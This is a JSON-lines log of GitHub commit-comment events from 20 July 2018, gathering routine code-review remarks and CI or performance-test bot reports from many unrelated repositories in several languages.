{"id":"7995029115","type":"CommitCommentEvent","actor":{"login":"VladFiliucov"},"repo":{"name":"i-shiryaev/thinknetica-ruby"},"payload":{"comment":{"id":29779263,"position":38,"line":98,"path":"Lesson_3/station_control.rb","commit_id":"76413b613d1aa185886d5120d9544efefbe0e94b","created_at":"2018-07-20T13:31:20Z","updated_at":"2018-07-20T13:31:20Z","author_association":"NONE","body":"Все-таки if next_station читается лучше, чем обратная проверка на nil. Давай упростим."}},"created_at":"2018-07-20T13:31:20Z"}
{"id":"7995029877","type":"CommitCommentEvent","actor":{"login":"benjaminapetersen"},"repo":{"name":"benjaminapetersen/js-lunch-and-learn"},"payload":{"comment":{"id":29779265,"position":null,"line":null,"path":null,"commit_id":"82ebe417017aafdf49a2201bdc4f374763a37039","created_at":"2018-07-20T13:31:29Z","updated_at":"2018-07-20T13:31:29Z","author_association":"OWNER","body":"@rhamilto @sg00dwin @amarie401 @jgiardino \r\n\r\nThis just eliminates a react warning, basically \"Hey, if you make a request for data, but we destroy your component before the request returns, your app will blow up!\".   Since we only make a request in `App`, if `App` is destroyed it means we closed the page, so its not really an issue.  That said, this is the fix.\r\n\r\nhttps://github.com/axios/axios#cancellation\r\n\r\nAlso added a `onChange` to `todoItem`, since we have all the other handlers as well.  These don't actually work, they are just stubbed in.\r\n\r\n"}},"created_at":"2018-07-20T13:31:29Z"}
{"id":"7995030268","type":"CommitCommentEvent","actor":{"login":"VladFiliucov"},"repo":{"name":"i-shiryaev/thinknetica-ruby"},"payload":{"comment":{"id":29779266,"position":48,"line":106,"path":"Lesson_3/station_control.rb","commit_id":"76413b613d1aa185886d5120d9544efefbe0e94b","created_at":"2018-07-20T13:31:33Z","updated_at":"2018-07-20T13:31:33Z","author_association":"NONE","body":"И тут"}},"created_at":"2018-07-20T13:31:33Z"}
{"id":"7995030449","type":"CommitCommentEvent","actor":{"login":"hackermd"},"repo":{"name":"dcmjs-org/dicomweb-client"},"payload":{"comment":{"id":29779268,"position":null,"line":null,"path":null,"commit_id":"3f6492a7da5d42121c173f8522d9cf3045765f61","created_at":"2018-07-20T13:31:35Z","updated_at":"2018-07-20T13:31:35Z","author_association":"MEMBER","body":"Otherwise looks great."}},"created_at":"2018-07-20T13:31:35Z"}
{"id":"7995030538","type":"CommitCommentEvent","actor":{"login":"raman007111"},"repo":{"name":"probelalkhan/Slim3-RestApi-Tutorial"},"payload":{"comment":{"id":29779269,"position":null,"line":null,"path":null,"commit_id":"f7b4683e799b4e6906c2f1fa158695a05d090334","created_at":"2018-07-20T13:31:36Z","updated_at":"2018-07-20T13:31:36Z","author_association":"NONE","body":"index file as an error\r\n\r\nrequire '../includes/DbOperations.php'; which gives error\r\n\r\nrequire './includes/DbOperations.php'; this is right\r\n\r\nonly one dot required\r\n\r\n"}},"created_at":"2018-07-20T13:31:36Z"}
{"id":"7995033388","type":"CommitCommentEvent","actor":{"login":"swederik"},"repo":{"name":"dcmjs-org/dicomweb-client"},"payload":{"comment":{"id":29779271,"position":null,"line":null,"path":null,"commit_id":"3f6492a7da5d42121c173f8522d9cf3045765f61","created_at":"2018-07-20T13:32:11Z","updated_at":"2018-07-20T13:32:11Z","author_association":"MEMBER","body":"Yeah I think that call doesn't actually have any query params. This was more of a POC, not meant to be final or anything. It's also a bit verbose to have this in each function, we should abstract it out."}},"created_at":"2018-07-20T13:32:11Z"}
{"id":"7995037079","type":"CommitCommentEvent","actor":{"login":"benjaminapetersen"},"repo":{"name":"benjaminapetersen/js-lunch-and-learn"},"payload":{"comment":{"id":29779277,"position":null,"line":null,"path":null,"commit_id":"62e032f5d1707356a66dce62d323ea3ebba70fda","created_at":"2018-07-20T13:32:54Z","updated_at":"2018-07-20T13:32:54Z","author_association":"OWNER","body":"HOMEWORK:\r\n\r\nPick a handler, make it work!  First, get the data locally to update.  If that works, look up how to `axios.post()` data back to `firebase` and see if you can get it to save."}},"created_at":"2018-07-20T13:32:54Z"}
{"id":"7995038059","type":"CommitCommentEvent","actor":{"login":"noobpwnftw"},"repo":{"name":"noobpwnftw/Stockfish"},"payload":{"comment":{"id":29779281,"position":null,"line":null,"path":null,"commit_id":"fd35c50222db475d83f56714ab20034bbf5002ba","created_at":"2018-07-20T13:33:05Z","updated_at":"2018-07-20T13:33:05Z","author_association":"OWNER","body":"I observed this issue when I test the MPI fork, sometimes the main thread has lower depth and a higher score that is going to fail high, but other threads has already resolved it with a lower score, they are never picked, wasting 5 ply of search!"}},"created_at":"2018-07-20T13:33:05Z"}
{"id":"7995043570","type":"CommitCommentEvent","actor":{"login":"taimur-akhtar"},"repo":{"name":"faysalali/Project_milstone1"},"payload":{"comment":{"id":29779288,"position":16,"line":16,"path":"app/assets/stylesheets/application.css","commit_id":"4fc081e2ee527683e5ed3918b2b2ab2dd4ca3117","created_at":"2018-07-20T13:34:08Z","updated_at":"2018-07-20T13:34:08Z","author_association":"NONE","body":"move them to another file named imports, where we can include all such imports."}},"created_at":"2018-07-20T13:34:08Z"}
{"id":"7995047570","type":"CommitCommentEvent","actor":{"login":"taimur-akhtar"},"repo":{"name":"faysalali/Project_milstone1"},"payload":{"comment":{"id":29779297,"position":1,"line":1,"path":"test/models/user_test.rb","commit_id":"4fc081e2ee527683e5ed3918b2b2ab2dd4ca3117","created_at":"2018-07-20T13:34:53Z","updated_at":"2018-07-20T13:34:53Z","author_association":"NONE","body":"remove all test files, refrain from committing them."}},"created_at":"2018-07-20T13:34:53Z"}
{"id":"7995050514","type":"CommitCommentEvent","actor":{"login":"nightblade9"},"repo":{"name":"deengames-prototypes/abu-hamid-x"},"payload":{"comment":{"id":29779298,"position":26,"line":51,"path":"src/prototype/Character/Player/Player.gd","commit_id":"76325321e0e440edd6a2d2e2ed0f7f0d532104ec","created_at":"2018-07-20T13:35:27Z","updated_at":"2018-07-20T13:35:27Z","author_association":"CONTRIBUTOR","body":"magic constant (`PI/2`). Please extract it into a named variable so we know what this represents and why we need it here."}},"created_at":"2018-07-20T13:35:27Z"}
{"id":"7995057357","type":"CommitCommentEvent","actor":{"login":"samm82"},"repo":{"name":"JacquesCarette/Drasil"},"payload":{"comment":{"id":29779312,"position":null,"line":null,"path":null,"commit_id":"9450abf6de8cae9956d1117fd65f86748c4c6105","created_at":"2018-07-20T13:36:43Z","updated_at":"2018-07-20T13:36:43Z","author_association":"COLLABORATOR","body":"Yes, but @JacquesCarette kept the branch open just in case something went terribly wrong. Given that we've now added two new subpackages (`drasil-gen` and `drasil-docLang`) with no problem, I think we can close it."}},"created_at":"2018-07-20T13:36:43Z"}
{"id":"7995070591","type":"CommitCommentEvent","actor":{"login":"TomaszChmielPagepro"},"repo":{"name":"Pagepro/arbitrage-frontend"},"payload":{"comment":{"id":29779332,"position":12,"line":19,"path":"src/TableRow.tsx","commit_id":"a66adb0e74593f4945cf28e1c3b88b1dae10adc1","created_at":"2018-07-20T13:39:12Z","updated_at":"2018-07-20T13:39:12Z","author_association":"COLLABORATOR","body":"Add componentWillUnmount with closing websocket logic\r\n\r\n`ws.close()`"}},"created_at":"2018-07-20T13:39:12Z"}
{"id":"7995072116","type":"CommitCommentEvent","actor":{"login":"poettering"},"repo":{"name":"systemd/systemd"},"payload":{"comment":{"id":29779336,"position":null,"line":null,"path":null,"commit_id":"7c30c3c44f84421bbe510fb3339378e075b3ab48","created_at":"2018-07-20T13:39:30Z","updated_at":"2018-07-20T13:39:30Z","author_association":"MEMBER","body":"@anandakumarb i am not sure what you mean by \"use\". Yes, journald wills store whatever you pass to it. But \"journalctl\" will only show the kernel's timestamp, except if you actually look in the SYSLOG_TIMESTAMP property."}},"created_at":"2018-07-20T13:39:30Z"}
{"id":"7995078953","type":"CommitCommentEvent","actor":{"login":"ymmt2005"},"repo":{"name":"cybozu-go/cke"},"payload":{"comment":{"id":29779354,"position":150,"line":241,"path":"status.go","commit_id":"90124039488f56f9f0ca853482e82189169515d5","created_at":"2018-07-20T13:40:48Z","updated_at":"2018-07-20T13:40:48Z","author_association":"MEMBER","body":"err は無視しないほうがいいです。万一 `address` がおかしい場合、\r\nreq が nil で SEGV します。err 拾うか、以下のように手動で *http.Request 作ります。\r\n\r\n```go\r\nreq := &http.Request{\r\n    Method: http.MethodGet,\r\n    URL: &url.URL{\r\n        Scheme: \"http\",\r\n        Host: adress+\":2379\",\r\n        Path: \"/health\",\r\n    },\r\n}\r\n```"}},"created_at":"2018-07-20T13:40:48Z"}
{"id":"7995081706","type":"CommitCommentEvent","actor":{"login":"nataliac06"},"repo":{"name":"ua-eas/ksd-kc5.2.1-rice"},"payload":{"comment":{"id":29779357,"position":13,"line":51,"path":"rice-framework/krad-web-framework/src/main/java/org/kuali/rice/krad/util/CsrfValidator.java","commit_id":"a09a4c9a3eb264e5465fbe682c846a8dd4fdaa01","created_at":"2018-07-20T13:41:20Z","updated_at":"2018-07-20T13:41:20Z","author_association":"NONE","body":"Since validateCsrf is going to be called with each request, I'd make refactor the following way:\r\n2. in CsrfValidator class declare a ParameterService parameterService = null;\r\n    protected static ParameterService getParameterService(){\r\n            if (parameterService == null )\r\n                  parameterService = CoreFrameworkServiceLocator.getParameterService();\r\n            return parameterService;\r\n     }\r\nUse getParameterService inside isCsrfProtectionEnabled()\r\n   "}},"created_at":"2018-07-20T13:41:20Z"}
{"id":"7995085194","type":"CommitCommentEvent","actor":{"login":"psyhtest"},"repo":{"name":"ctuning/ck-nntest"},"payload":{"comment":{"id":29779361,"position":16,"line":37,"path":"script/process-nntest-conv/process.py","commit_id":"bfd85548d1ee773d2d4e07799d1526853186a6fa","created_at":"2018-07-20T13:42:01Z","updated_at":"2018-07-20T13:42:01Z","author_association":"CONTRIBUTOR","body":"`kernels=3,5` - [fixed](https://github.com/ctuning/ck-nntest/commit/2999c7455aae0fcdfc9a4920d26f6bb155f912b2)"}},"created_at":"2018-07-20T13:42:01Z"}
{"id":"7995091179","type":"CommitCommentEvent","actor":{"login":"nataliac06"},"repo":{"name":"ua-eas/ksd-kc5.2.1-rice"},"payload":{"comment":{"id":29779379,"position":26,"line":111,"path":"rice-framework/krad-web-framework/src/main/java/org/kuali/rice/krad/util/CsrfValidator.java","commit_id":"a09a4c9a3eb264e5465fbe682c846a8dd4fdaa01","created_at":"2018-07-20T13:43:08Z","updated_at":"2018-07-20T13:43:08Z","author_association":"NONE","body":"KRADConstants is ithe right place for the parameter related string constants. Please use this instead of RiceKeyConstants and check for the other ones that might already be defined in there - like \r\nKUALI_RICE_SYSTEM_NAMESPACE for \"KR-SYS\""}},"created_at":"2018-07-20T13:43:08Z"}
{"id":"7995093779","type":"CommitCommentEvent","actor":{"login":"grochu"},"repo":{"name":"KAGA164/zephyr"},"payload":{"comment":{"id":29779383,"position":16,"line":692,"path":"include/bluetooth/gatt.h","commit_id":"e99f16c4fb8ab0745c4f77fde2a99d50f601e2a1","created_at":"2018-07-20T13:43:38Z","updated_at":"2018-07-20T13:43:38Z","author_association":"NONE","body":"\"This callback informs the application that a notification was transmitted.\""}},"created_at":"2018-07-20T13:43:38Z"}
{"id":"7995098458","type":"CommitCommentEvent","actor":{"login":"greysteil"},"repo":{"name":"cormacrelf/angular-skyhook"},"payload":{"comment":{"id":29779393,"position":null,"line":null,"path":null,"commit_id":"c010dd5284553e5a34d6fb9f66ec6cc1e837fd1f","created_at":"2018-07-20T13:44:31Z","updated_at":"2018-07-20T13:44:31Z","author_association":"NONE","body":"Sorry you had to do this! Just saw the exceptions on our (Dependabot's) side - I'll tweak things so Dependabot can handle any valid Lerna path now."}},"created_at":"2018-07-20T13:44:31Z"}
{"id":"7995100188","type":"CommitCommentEvent","actor":{"login":"arnaudviala"},"repo":{"name":"arnaudviala/celinecv"},"payload":{"comment":{"id":29779399,"position":14,"line":83,"path":"cv.html","commit_id":"15833810079f86c9622c68e5e3824aea82a5f021","created_at":"2018-07-20T13:44:52Z","updated_at":"2018-07-20T13:44:52Z","author_association":"OWNER","body":"(Je découvre les commentaires de GitHub, je sais pas comment ça marche précisément. Es-tu notifiée en temps-réel de ce que j'écris ?)\r\n\r\nIl n'y a pas de \"t\" dans Jenkins ;-).\r\n\r\nMoi aussi, je fais la même erreur, je rajoute un \"d\" dans Rogers (un opérateur télécom au Canada)"}},"created_at":"2018-07-20T13:44:52Z"}
{"id":"7995103749","type":"CommitCommentEvent","actor":{"login":"crazyscientist"},"repo":{"name":"openSUSE/osc"},"payload":{"comment":{"id":29779411,"position":null,"line":null,"path":null,"commit_id":"fc37d526b4516f0769a75d110712f66f81007c99","created_at":"2018-07-20T13:45:30Z","updated_at":"2018-07-20T13:45:30Z","author_association":"NONE","body":"Fix for #433"}},"created_at":"2018-07-20T13:45:30Z"}
{"id":"7995104086","type":"CommitCommentEvent","actor":{"login":"grochu"},"repo":{"name":"KAGA164/zephyr"},"payload":{"comment":{"id":29779412,"position":31,"line":707,"path":"include/bluetooth/gatt.h","commit_id":"e99f16c4fb8ab0745c4f77fde2a99d50f601e2a1","created_at":"2018-07-20T13:45:33Z","updated_at":"2018-07-20T13:45:33Z","author_association":"NONE","body":"If this function is only to be used for GATT notification callbacks, maybe it should have \"notification\" in its name?"}},"created_at":"2018-07-20T13:45:33Z"}
{"id":"7995105166","type":"CommitCommentEvent","actor":{"login":"JCofman"},"repo":{"name":"JCofman/jc-website"},"payload":{"comment":{"id":29779417,"position":null,"line":null,"path":null,"commit_id":"c9092ef938ae2e608b135b54241ef210589376a0","created_at":"2018-07-20T13:45:45Z","updated_at":"2018-07-20T13:45:45Z","author_association":"OWNER","body":"\n# WebpageTest report\n* run id: 180720_T7_417a349845d4dbf9178cef237aeca284\n* URL testid: https://blazingly-fast-blog-kvywuflxwi.now.sh\n* Summary of the test: http://www.webpagetest.org/results.php?test=180720_T7_417a349845d4dbf9178cef237aeca284\n* location where the test has run: Dulles:Chrome\n* from run parameter: Dulles, VA - <b>Chrome</b> - <b>Cable</b>\n* connectivity: Cable\n* runs: [object Object], successFullRuns: 1\n\n## Report\n### FirstView\n| File | FileSize | \n|----------|----------|\n /|2.24 kB \r\n/favicon.ico|729 B \r\n\n\n# VisualMetrics\n## Metrics Median\n| View | Time to First Byte |  Render Started  |  Visualy Completed | SpeedIndex | Load Time |\n|----------|----------|:-------------:|------:| ------:|------:|\nFirstView  | 1103 | 0 | 0 | 0 | 1129 |  \nRepeatView | 673 | 0 | 0 | 0 | 707 |  \n\n  ## Metrics Average\n| View | Time to First Byte |  Render Started  |  Visualy Completed | SpeedIndex | Load Time |\n|----------|----------|:-------------:|------:| ------:|------:|\nFirstView  | 1103 | 0 | 0 | 0 | 1129 |  \nRepeatView | 673 | 0 | 0 | 0 | 707 |  \n\n\n# Waterfall\n\n## FirstView median\n![alt text](http://www.webpagetest.org/results/18/07/20/T7/417a349845d4dbf9178cef237aeca284/1_waterfall.png)\n\n\n# FilmStrip\n## FirstView median\n\n| 0 milliseconds|\n|--------------|\n| ![alt text](http://www.webpagetest.org/getfile.php?test=180720_T7_417a349845d4dbf9178cef237aeca284&video=video_1&file=ms_000000.jpg)|\n| 100|\n    \n        \n\n## ReapeatView median\n\n| 0 milliseconds|\n|--------------|\n| ![alt text](http://www.webpagetest.org/getfile.php?test=180720_T7_417a349845d4dbf9178cef237aeca284&video=video_1_cached&file=ms_000000.jpg)|\n| 100|\n    \n    "}},"created_at":"2018-07-20T13:45:45Z"}
{"id":"7995105731","type":"CommitCommentEvent","actor":{"login":"broerse"},"repo":{"name":"mharris717/ember-cli-pagination"},"payload":{"comment":{"id":29779419,"position":null,"line":null,"path":null,"commit_id":"4b58f21d3625e5c1046c99d966cce185321e3efa","created_at":"2018-07-20T13:45:52Z","updated_at":"2018-07-20T13:45:52Z","author_association":"COLLABORATOR","body":"@mixonic I am working with ember-cli-pagination in ember 3.3.0 without any problems but Travis is failing a lot off tests. I just fixed some deprecation warnings but I don't think they cause the fails. Do you have time to take a look?"}},"created_at":"2018-07-20T13:45:52Z"}
{"id":"7995112133","type":"CommitCommentEvent","actor":{"login":"karthicgit"},"repo":{"name":"karthicgit/Ansiblenotes"},"payload":{"comment":{"id":29779435,"position":null,"line":null,"path":null,"commit_id":"6724cb5a14931d67de8cc266b6a5ad9e7a286199","created_at":"2018-07-20T13:47:03Z","updated_at":"2018-07-20T13:47:03Z","author_association":"OWNER","body":"updated"}},"created_at":"2018-07-20T13:47:03Z"}
{"id":"7995113053","type":"CommitCommentEvent","actor":{"login":"nightblade9"},"repo":{"name":"deengames-prototypes/abu-hamid-x"},"payload":{"comment":{"id":29779438,"position":38,"line":22,"path":"src/prototype/Sword.gd","commit_id":"76325321e0e440edd6a2d2e2ed0f7f0d532104ec","created_at":"2018-07-20T13:47:13Z","updated_at":"2018-07-20T13:47:13Z","author_association":"CONTRIBUTOR","body":"magic constant. fix please."}},"created_at":"2018-07-20T13:47:13Z"}
{"id":"7995115079","type":"CommitCommentEvent","actor":{"login":"Akryum"},"repo":{"name":"vuejs/vue-cli"},"payload":{"comment":{"id":29779444,"position":6,"line":53,"path":"packages/@vue/cli/bin/vue.js","commit_id":"7e6c37c09bfd9e6a7733a60799f7cadd9bf5c5f7","created_at":"2018-07-20T13:47:35Z","updated_at":"2018-07-20T13:47:35Z","author_association":"MEMBER","body":"@yyx990803 But you didn't implement it?"}},"created_at":"2018-07-20T13:47:35Z"}
{"id":"7995128752","type":"CommitCommentEvent","actor":{"login":"vincentfretin"},"repo":{"name":"assembl/assembl"},"payload":{"comment":{"id":29779476,"position":null,"line":null,"path":null,"commit_id":"5e627bd6d5955e4727dc0b13054c7faeddac46b0","created_at":"2018-07-20T13:50:08Z","updated_at":"2018-07-20T13:50:08Z","author_association":"CONTRIBUTOR","body":"This is silly, displayName is actually 'fullname || username' is the backend. The username purpose is really a login and is not meant to be seen. We should maybe look at how username is used in different discussion. I personally use Vincent.Fretin of vincentfretin, I don't want to see that in my messages!\r\n\r\nIf we want a nickname (pseudonyme), it's really a new field for me."}},"created_at":"2018-07-20T13:50:08Z"}
{"id":"7995135072","type":"CommitCommentEvent","actor":{"login":"jhenin"},"repo":{"name":"Colvars/colvars"},"payload":{"comment":{"id":29779501,"position":null,"line":null,"path":null,"commit_id":"acdf3228bc9439df108fad935cd6c20d06a0b526","created_at":"2018-07-20T13:51:18Z","updated_at":"2018-07-20T13:51:18Z","author_association":"MEMBER","body":"@giacomofiorin Does this change looks like a problem to you?"}},"created_at":"2018-07-20T13:51:18Z"}
{"id":"7995135666","type":"CommitCommentEvent","actor":{"login":"markl65536"},"repo":{"name":"markl65536/npgsql"},"payload":{"comment":{"id":29779503,"position":null,"line":null,"path":null,"commit_id":"6a3e12da4d696b64866e0bfa8b510ad1199853a7","created_at":"2018-07-20T13:51:25Z","updated_at":"2018-07-20T13:51:25Z","author_association":"OWNER","body":"Proposed fix for [issue #2071](https://github.com/npgsql/npgsql/issues/2071).\r\n\r\n`System.Windows.Threading.Dispatcher` relies on `object` keys in `PostgresException.Data` so implementation was changed from `Dictionary<string, object>` to `Dictionary<object, object>`."}},"created_at":"2018-07-20T13:51:25Z"}
{"id":"7995144505","type":"CommitCommentEvent","actor":{"login":"benbosse"},"repo":{"name":"hawku/TabletDriver"},"payload":{"comment":{"id":29779524,"position":null,"line":null,"path":null,"commit_id":"33bd37360da3a092b697d1b912ebeb5a89b79f5e","created_at":"2018-07-20T13:53:04Z","updated_at":"2018-07-20T13:53:04Z","author_association":"NONE","body":"When you drive a feather through the air it starts to push from side to side. Please fix. Tablet: Wacom CTL-472"}},"created_at":"2018-07-20T13:53:04Z"}
{"id":"7995145019","type":"CommitCommentEvent","actor":{"login":"RobLoach"},"repo":{"name":"libretro/Lakka-LibreELEC"},"payload":{"comment":{"id":29779526,"position":null,"line":null,"path":null,"commit_id":"ddff7a1f42ddf56781c6c1eda9983f44087e3b32","created_at":"2018-07-20T13:53:10Z","updated_at":"2018-07-20T13:53:10Z","author_association":"MEMBER","body":"Mind making an issue over at http://github.com/libretro/desmume ?"}},"created_at":"2018-07-20T13:53:10Z"}
{"id":"7995145965","type":"CommitCommentEvent","actor":{"login":"benhaynes"},"repo":{"name":"directus/app"},"payload":{"comment":{"id":29779529,"position":367,"line":578,"path":"src/routes/login.vue","commit_id":"22d28f0ef307f9d8cea042fab14e8709629f28ac","created_at":"2018-07-20T13:53:19Z","updated_at":"2018-07-20T13:53:19Z","author_association":"CONTRIBUTOR","body":"@rijkvanzanten ... proven guilty."}},"created_at":"2018-07-20T13:53:19Z"}
{"id":"7995146378","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29779531,"position":null,"line":null,"path":null,"commit_id":"e17266cba39a9a4fe68cfcb5ff574472db47fd3e","created_at":"2018-07-20T13:53:23Z","updated_at":"2018-07-20T13:53:23Z","author_association":"NONE","body":"#6599-HVACAirloopUnitarySystem-does-not-honor-continuous-fan-mode-using-multispeed-heating-coil (mjwitte) - x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug: OK (1695 of 1695 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-e17266cba39a9a4fe68cfcb5ff574472db47fd3e-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-e17266cba39a9a4fe68cfcb5ff574472db47fd3e-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-e17266cba39a9a4fe68cfcb5ff574472db47fd3e-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Coverage Badge](http://img.shields.io/badge/coverage%20status-40.02%25-green.png)</a>\n"}},"created_at":"2018-07-20T13:53:23Z"}
{"id":"7995149716","type":"CommitCommentEvent","actor":{"login":"alwayslikethat"},"repo":{"name":"DuGuQiuBai/Java"},"payload":{"comment":{"id":29779537,"position":null,"line":null,"path":null,"commit_id":"f7aa7398c6e0e856125d4c7f3446a9406198ca3d","created_at":"2018-07-20T13:54:00Z","updated_at":"2018-07-20T13:54:00Z","author_association":"NONE","body":"thanks !"}},"created_at":"2018-07-20T13:54:00Z"}
{"id":"7995159135","type":"CommitCommentEvent","actor":{"login":"matthewbauer"},"repo":{"name":"NixOS/nixpkgs"},"payload":{"comment":{"id":29779555,"position":null,"line":null,"path":null,"commit_id":"aab3182ca4a2b69bfd01db53e1e95c941425203b","created_at":"2018-07-20T13:55:39Z","updated_at":"2018-07-20T13:55:39Z","author_association":"MEMBER","body":"No problem!"}},"created_at":"2018-07-20T13:55:39Z"}
{"id":"7995164746","type":"CommitCommentEvent","actor":{"login":"mr-Geadev"},"repo":{"name":"mascazo/tajem_PSD"},"payload":{"comment":{"id":29779569,"position":2,"line":2,"path":"main.html","commit_id":"194ebe2530514b04d26ef8a2a31252f2a5401e01","created_at":"2018-07-20T13:56:39Z","updated_at":"2018-07-20T13:56:39Z","author_association":"NONE","body":"what is a lang ? "}},"created_at":"2018-07-20T13:56:39Z"}
{"id":"7995165386","type":"CommitCommentEvent","actor":{"login":"JCofman"},"repo":{"name":"JCofman/jc-website"},"payload":{"comment":{"id":29779570,"position":null,"line":null,"path":null,"commit_id":"c9092ef938ae2e608b135b54241ef210589376a0","created_at":"2018-07-20T13:56:46Z","updated_at":"2018-07-20T13:56:46Z","author_association":"OWNER","body":"\n# WebpageTest report\n* run id: 180720_NQ_fa9cd47381983bb952ddf539bf11fab0\n* URL testid: https://blazingly-fast-blog-ytsdkljccn.now.sh\n* Summary of the test: http://www.webpagetest.org/results.php?test=180720_NQ_fa9cd47381983bb952ddf539bf11fab0\n* location where the test has run: Dulles:Chrome\n* from run parameter: Dulles, VA - <b>Chrome</b> - <b>Cable</b>\n* connectivity: Cable\n* runs: [object Object], successFullRuns: 1\n\n## Report\n### FirstView\n| File | FileSize | \n|----------|----------|\n /|2.24 kB \r\n/favicon.ico|729 B \r\n\n\n# VisualMetrics\n## Metrics Median\n| View | Time to First Byte |  Render Started  |  Visualy Completed | SpeedIndex | Load Time |\n|----------|----------|:-------------:|------:| ------:|------:|\nFirstView  | 1588 | 0 | 0 | 0 | 1611 |  \nRepeatView | 0 | 0 | 0 | 0 | 30092 |  \n\n  ## Metrics Average\n| View | Time to First Byte |  Render Started  |  Visualy Completed | SpeedIndex | Load Time |\n|----------|----------|:-------------:|------:| ------:|------:|\nFirstView  | 1588 | 0 | 0 | 0 | 1611 |  \nRepeatView | undefined | undefined | undefined | undefined | undefined |  \n\n\n# Waterfall\n\n## FirstView median\n![alt text](http://www.webpagetest.org/results/18/07/20/NQ/fa9cd47381983bb952ddf539bf11fab0/1_waterfall.png)\n\n\n# FilmStrip\n## FirstView median\n\n| 0 milliseconds|\n|--------------|\n| ![alt text](http://www.webpagetest.org/getfile.php?test=180720_NQ_fa9cd47381983bb952ddf539bf11fab0&video=video_1&file=ms_000000.jpg)|\n| 100|\n    \n        \n\n## ReapeatView median\n\n| 0 milliseconds|\n|--------------|\n| ![alt text](http://www.webpagetest.org/getfile.php?test=180720_NQ_fa9cd47381983bb952ddf539bf11fab0&video=video_1_cached&file=ms_000000.jpg)|\n| 100|\n    \n    "}},"created_at":"2018-07-20T13:56:46Z"}
{"id":"7995166813","type":"CommitCommentEvent","actor":{"login":"nmat"},"repo":{"name":"wavebox/waveboxapp"},"payload":{"comment":{"id":29779574,"position":null,"line":null,"path":null,"commit_id":"4bbe75f8ca1f60001dd3eb94127651283b5ade48","created_at":"2018-07-20T13:57:01Z","updated_at":"2018-07-20T13:57:01Z","author_association":"CONTRIBUTOR","body":"Seems to work fine on macOS....on windows 10 it still switches though. :/ tested to do a npm run clean:all and reinstall it and also try to launch beta channel then git version but still same effect"}},"created_at":"2018-07-20T13:57:01Z"}
{"id":"7995169667","type":"CommitCommentEvent","actor":{"login":"eduard-vasinskyi"},"repo":{"name":"softindex/datakernel"},"payload":{"comment":{"id":29779584,"position":null,"line":null,"path":null,"commit_id":"f29cd946bdf6b5d56326bfb4cf4c69b1bda04c3e","created_at":"2018-07-20T13:57:32Z","updated_at":"2018-07-20T13:57:32Z","author_association":"NONE","body":"![](https://github.trello.services/images/mini-trello-icon.png) [SerializerGenEnum - as varInt](https://trello.com/c/Tz50e5bf/178-serializergenenum-as-varint)"}},"created_at":"2018-07-20T13:57:32Z"}
{"id":"7995169740","type":"CommitCommentEvent","actor":{"login":"mr-Geadev"},"repo":{"name":"mascazo/tajem_PSD"},"payload":{"comment":{"id":29779585,"position":49,"line":49,"path":"main.html","commit_id":"194ebe2530514b04d26ef8a2a31252f2a5401e01","created_at":"2018-07-20T13:57:33Z","updated_at":"2018-07-20T13:57:33Z","author_association":"NONE","body":"remove div with class \"test\"\r\nonly h1\r\n"}},"created_at":"2018-07-20T13:57:33Z"}
{"id":"7995175499","type":"CommitCommentEvent","actor":{"login":"bryanasuncion"},"repo":{"name":"bitcoin-wallet/bitcoin-wallet"},"payload":{"comment":{"id":29779595,"position":null,"line":null,"path":null,"commit_id":"6126e03bafc09b177c194c68638e5b1f30be9601","created_at":"2018-07-20T13:58:14Z","updated_at":"2018-07-20T13:58:14Z","author_association":"NONE","body":"HTTP GET"}},"created_at":"2018-07-20T13:58:14Z"}
{"id":"7995183954","type":"CommitCommentEvent","actor":{"login":"rico6822"},"repo":{"name":"Regalis11/Barotrauma"},"payload":{"comment":{"id":29779613,"position":null,"line":null,"path":null,"commit_id":"0abdcb969ded4a15ead0d26e14b085501b6b670f","created_at":"2018-07-20T13:59:40Z","updated_at":"2018-07-20T13:59:40Z","author_association":"NONE","body":"Good job. People waited long for being able to vote round ending without having ot respawn."}},"created_at":"2018-07-20T13:59:40Z"}
{"id":"7995184135","type":"CommitCommentEvent","actor":{"login":"mr-Geadev"},"repo":{"name":"mascazo/tajem_PSD"},"payload":{"comment":{"id":29779615,"position":50,"line":50,"path":"main.html","commit_id":"194ebe2530514b04d26ef8a2a31252f2a5401e01","created_at":"2018-07-20T13:59:42Z","updated_at":"2018-07-20T13:59:42Z","author_association":"NONE","body":"not use class with name of tags\r\nGood solution for that class name is \"description\", for example"}},"created_at":"2018-07-20T13:59:42Z"}
{"id":"7995184911","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29779621,"position":null,"line":null,"path":null,"commit_id":"b743c93a2505b2b6701159344167851ea1b8b857","created_at":"2018-07-20T13:59:51Z","updated_at":"2018-07-20T13:59:51Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-20T13:59:51Z"}
